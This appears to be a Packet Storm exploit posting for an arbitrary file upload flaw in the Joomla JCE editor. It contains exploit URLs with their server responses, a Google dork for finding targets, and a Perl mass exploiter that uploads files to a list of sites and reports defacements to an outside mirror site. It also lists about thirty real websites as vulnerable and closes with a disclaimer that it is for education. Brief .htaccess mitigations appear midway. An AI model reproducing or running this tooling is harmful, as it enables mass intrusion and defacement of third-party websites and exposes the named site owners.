exploit the possibilities

Joomla JCE 2.6.33 Arbitrary File Upload

Joomla JCE 2.6.33 Arbitrary File Upload
Posted Dec 1, 2018
Authored by KingSkrupellos

Joomla JCE component versions 2.6.7.1 through 2.6.33 suffer from an arbitrary file upload vulnerability.

tags | exploit, arbitrary, file upload
MD5 | 5c23c1abd98f1e33707301cc61401134

Joomla JCE 2.6.33 Arbitrary File Upload

Change Mirror Download
#################################################################################

# Exploit Title : Joomla Content Editor JCE com_jce Components Image
Manager Plugin 2.6.33 Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Vulnerability Published Date : 30/11/2018
# Vulnerability First Discovered Date : 10/03/2014
# Vendor Homepage : joomlacontenteditor.net
# Software Download Links : joomlacontenteditor.net/downloads /
+ extensions.joomla.org/extension/jce/ ~
joomlacontenteditor.net/downloads/editor/core ~
+ joomlacontenteditor.net/downloads/editor/core/9
+ JCE 2.6.33 =>
joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1353&element=
f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=9ee3309d5768681d0360490d647c2266
+ JCE 2.6.7.1 =>
joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=
1255&element=f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=547c7217f6fad641a91db0b982dd72b6
# Version Information : From JCE 2.6.7.1 to JCE 2.6.33 All Versions are
affected.
+ Installation package for Joomla! 2.5 & 3.x - Previous Versions before
2.x are not affected.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks => inurl:''/index.php?option=com_jce''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]

##############################################################################################

++++++++++++ Extended Exploit and Vulnerability Information Reference Links
+++++++++++++

# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018050200
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2118
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=29762
# SecurityNewsWire Exploit Link :
securitynewswire.com/latestsecuritynews/mobile_article.php?title=
Joomla_Content_Editor_JCE_ImageManager_Vulnerability_Mass_Auto_Exploiter
# Reddit Exploit Link : :
reddit.com/r/phpAdvisories/comments/8lzi1t/joomla_content_editor_jce_imagemanager/
# HackerTor Exploit Link :
hackertor.com/2018/05/24/joomla-content-editor-jce-imagemanager-vulnerability-mass-auto-exploiter/
# PhpSecure Exploit Link : phpsecure.info/go/163420.html
# Cyberizm Exploit Link :
cyberizm.org/cyberizm-joomla-content-editor-jce-auto-mass-exploiter.html

##############################################################################################

Original Exploit Title :

Joomla Content Editor JCE Image Manager Plugin 2.6.33 Remote File Upload
Vulnerability and Mass Autor Exploiter Perl

##############################################################################################

# Description of the Product =>

JCE makes creating and editing Joomla!A(r) content easy...
Add a set of tools to your Joomla!A(r) environment that gives you the power to
create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML,
CSS...

Office-like functions and familiar buttons make formatting simple
Upload, rename, delete, cut/copy/paste images and insert them into your
articles using an intuitive and familiar interface
Create Links to Categories, Articles, Weblinks and Contacts in your site
using a unique and practical Link Browser
Easily tab between WYSIWYG, Code and Preview modes.
Create Tables, edit Styles, format text and more...
Integrated Spellchecking using your browser's Spellchecker
Fine-grained control over the editor layout and features with Editor
Profiles

Media Manager => Upload and insert a range of common media files including
AdobeA(r) FlashA(r), Apple QuicktimeA(r),
Windows Media PlayerA(r) and HTML 5 Video and Audio.
Easily insert Youtube and Vimeo videos - just paste in the URL and Insert!
Insert HTML5 Video and Audio with multiple source options

Image Manager Extended => Create a thumbnail of any part of an image with
the Thumbnail Editor
Insert multiple images. Create responsive images with the srcset attribute
Create image popups in a few clicks - requires JCE MediaBox or compatible
Popup Extension

Filemanager => Create links to images, documents, media and other common
file types
Include a file type icon, file size and modified date
Insert as a link or embed the document with an iframe
Create downloadable files using the download attribute.

Template Manager => Insert pre-defined template content form html or text
files
Create template snippet files from whole articles or selected content
Configure the Template Manager to set the startup content of new articles

##############################################################################################

Outdated versions of the Joomla extension JCE contain a very serious
security vulnerability

that allows a hacker to upload files remotely to a website.

You can search all plugins and themes to find more sites.

Most of them have this plugin JCE installed. [ % 40 or more ] Use your
brain.

Explanation for Joomla Content Editor JCE =>

[ ScreenShot from Administrator Control Panel ] =>

cdn.pbrd.co/images/Hmx6KZC.jpg ~ cdn.pbrd.co/images/HmypA0v.png

Note : This Joomla JCE is not the previous exploit going to this path =>
..../images/stories/......php => NO

Previous Version Exploit Link => bugreport.ir/78/exploit.htm => This
doesn't work for this vulnerability.

Notes => Joomla Content Editor JCE Toggle Editor / Image Manager behind the
Administration Panel

[ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg

This exploit have no path :

We don't need any username and pass for bypassing the admin panel. There is
a little trick here.

TARGETSAdegTE/yourfilename.png .gif .jpg or
TARGETSAdegTE/images/yourfilename.html => YES

.php .asp .jpg .gif .png =>

##############################################################################################

Install JCE Editor in Joomla! 2.5 Tutorial

[video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video]

Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial

[video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video]

How to Update Upgrade a Joomla! Page that uses JCE: the Joomla Content
Editor. Fix the Bugs for this Vulnerability

[video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video]

##############################################################################################

Solution for this Security Issue =>

Add .htaccess file in /images/ and for /public_html/ homepage folder that
disallows any scripts to be run.

Put this in your .htaccess file:

AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .shtml
.sh .cgi .exe .png .jpg .gif .txt .html .htm
Options -ExecCGI

that makes it so scripts of those extensions are not allowed to run, and
will generate a FORBIDDEN error if tried.

Another thing to consider in the .htaccess, is something like this:

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?yourwebsite.com/.*$ [NC]
RewriteRule \.(gif|jpg|png)$ - [F]

The above will not allow anyone to view the images unless they are viewing
them

as content on "yourwebsite.com". This stops people from linking your images.

Or you can try this =>

1. add the following .htaccess into ./images/.htaccess folder to prevent
php shell running

#####################
Options -Indexes
php_flag engine 0
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp
.aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml .gif .png .jpg .txt
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6
.phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml
.gif .png .jpg .txt

#####################

2. deny access to /tmp folder by adding ./tmp/.htaccess with the following
content

#####################

deny from all

#####################

##############################################################################################

You can check with this exploit codes on your browser if the sites are
vulnerable for testing the security. So you will see some errors.

For Exploiting the Sites - use Auto Mass Exploiter Perl.

Exploit =>

/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20

{"result":{"error":true,"result":""},"error":null}

Exploit =>

/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":null,"error":"No function call specified!"}

Exploit =>

/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/

{"result":null,"error":"No function call specified!"}

Directory File Path =>

TARGETSAdegTE/yourfilename.png

or

TARGETSAdegTE/images/yourfilename.png

##############################################################################################

Joomla JCE Image Manager Auto Mass Exploiter Perl =>

#!/usr/bin/perl
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4)
Gecko/20030624 Netscape/7.1 (ax)");
$ua->timeout (10);
system('title Joomla JCE All Versions Mass Auto Exploiter Perl by
KingSkrupellos');
print "JCE Mass Auto Exploiter\n";
print "Coded by KingSkrupellos\n";
print "Cyberizm Digital Security Team\n";
print "Please Give WebSites List Here:";
my $list=<STDIN>;
chomp($list);
open (THETARGET, "<$list") || die ">>>WebSite cannot be open. Wrong URL
Link<<< !";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;

foreach $site(@TARGETS){

chomp $site;
if($site !~ /http:\/\//) { $site = "http://$site/"; };
$exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
print "wait upload $site\n";

$vulnurl=$site.$exploiturl;
$res = $ua->get($vulnurl)->content;
if ($res =~ m/No function call specified!/i){
open(save, '>>C:\Users\YOURNAMEHERE\KingSkrupellos\result\list.txt');

print "\n[Uploading]";
my $res = $ua->post($vulnurl,
Content_Type => 'form-data',
Content => [
'upload-dir' => './../../',
'upload-overwrite' => 0,
'Filedata' => ["kingskrupellos.png"],
'action' => 'upload'

]
)->decoded_content;
if ($res =~ m/"error":false/i){

}else{
print " ......... ";
print color('bold white');
print "[";
print color('reset');
print color('bold green');
print "PATCHED";
print color('reset');
print color('bold white');
print "] \n";
print color('reset');
}

$remote = IO::Socket::INET->new(
Proto=>
PeerAddr=>"$site",
PeerPort=>
Timeout=>
);
$def= "$site/kingskrupellos.png";
print colored ("[+]Successfully Exploited",'white on_red'),"\n";
print "$site/kingskrupellos.png\n";
}else{
print colored (">>Exploit Don't Work. Wrong URL Link. Not
Vulnerable.<<",'white on_blue'),"\n";
}
}
sub zonpost{
$req = HTTP::Request->new(GET=>$link);
$useragent = LWP::UserAgent->new();
$response = $useragent->request($req);
$ar = $response->content;
if ($ar =~ /Hacked By KingSkrupellos/){

$dmn= $link;
$def="KingSkrupellos";
$zn="http://aljyyosh.org/single.php";
$lwp=LWP::UserAgent->new;
$res=$lwp -> post($zn,[
'defacer' => $def,
'domain1' => $dmn,
'hackmode' => '15',
'reason' => '1',
'GAPnder' => 'Send',
]);
if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
print colored ("[-]Send WebSites to Mirror $1",'white on_green'),"\n";
}
else
{
print colored ("[-]Error Has Occured",'black on_white'),"\n";
}
}else{
print" Zone Could'nt be Taken From Aljyyosh!! \n";

}
}

##############################################################################################

# Usage Explained =>

Download XAMPP for your Operating System => apachefriends.org/download.html

XAMPP for Windows 5.6.38, 7.0.32, 7.1.24 & 7.2.12

XAMPP for Linux 5.6.38, 7.0.32, 7.1.24 & 7.2.12

XAMPP for OS X 5.6.38, 7.0.32, 7.1.24, 7.2.12, XAMPP-VM & XAMPP-VM

How to use this code perl on your operating system like Windows ; [ You
can run this code also for Linux OS, too. ]

Open Start + Go to Search Button + Type + Command Prompt => or cmd.exe

Or you can use ConEmulator for Windows => conemu.github.io => Download it
and use it.

Create a folder like " jcee " in your Desktop and put your jceexploit.pl
and yourimagefile.png ,gif ,png ,html ,txt

C:/Users/Your-Computer-Name/

cd Desktop

cd "jcee"

perl yourexploitcodenamejce.pl

site.txt

Waiting for Upload

Exploit Successful or Not

Finished

##############################################################################################

Example Vulnerable Sites => [ More on Search Engines like Google - Yahoo -
Bing and others etc.. - Use your Brain... ]

abcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/

{"result":{"error":true,"result":""},"error":null}

sv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

http://www.mocollc.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

sisdesign.com.br/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

horizonclimatecontrols.ca/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

living-anatomy.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

vera-karelli.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

noatrans.fr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

vietthiphotography.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

franciscoqueiroz.com.br/portal/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

dessupoiu.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

restoran-tamada.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

elsonllc.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

aidem.in/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

ruralsouthtexasedc.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

parbutaranfurniture.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

anhadesigns.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

heartofasportsman.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

sv-langwedel.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

laboratoriodellarte.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

wagadu-jikke.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

lasolida.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

premiorenatofucini.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

poliambulatoriolattanzi.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

specialitainvetrina.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

comune.scalea.cs.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

cavambrosiano.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

fratellidisoledad.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

vitaminasport.bg/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

personnalisationcarte.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

taxi3305050.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

studioconsulenzasportiva.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}

misericordiamontalto.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload

{"result":{"error":true,"result":""},"error":null}


THE END

##############################################################################################

Author is not responsible for any damage of the websites. This Article has
been written with the purpose of education.

##############################################################################################

Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

##############################################################################################
Login or Register to add favorites

File Archive:

May 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    14 Files
  • 2
    May 2nd
    3 Files
  • 3
    May 3rd
    1 Files
  • 4
    May 4th
    18 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    21 Files
  • 7
    May 7th
    15 Files
  • 8
    May 8th
    19 Files
  • 9
    May 9th
    1 Files
  • 10
    May 10th
    2 Files
  • 11
    May 11th
    18 Files
  • 12
    May 12th
    39 Files
  • 13
    May 13th
    15 Files
  • 14
    May 14th
    17 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    2 Files
  • 17
    May 17th
    2 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    21 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    15 Files
  • 22
    May 22nd
    6 Files
  • 23
    May 23rd
    1 Files
  • 24
    May 24th
    1 Files
  • 25
    May 25th
    2 Files
  • 26
    May 26th
    23 Files
  • 27
    May 27th
    13 Files
  • 28
    May 28th
    18 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close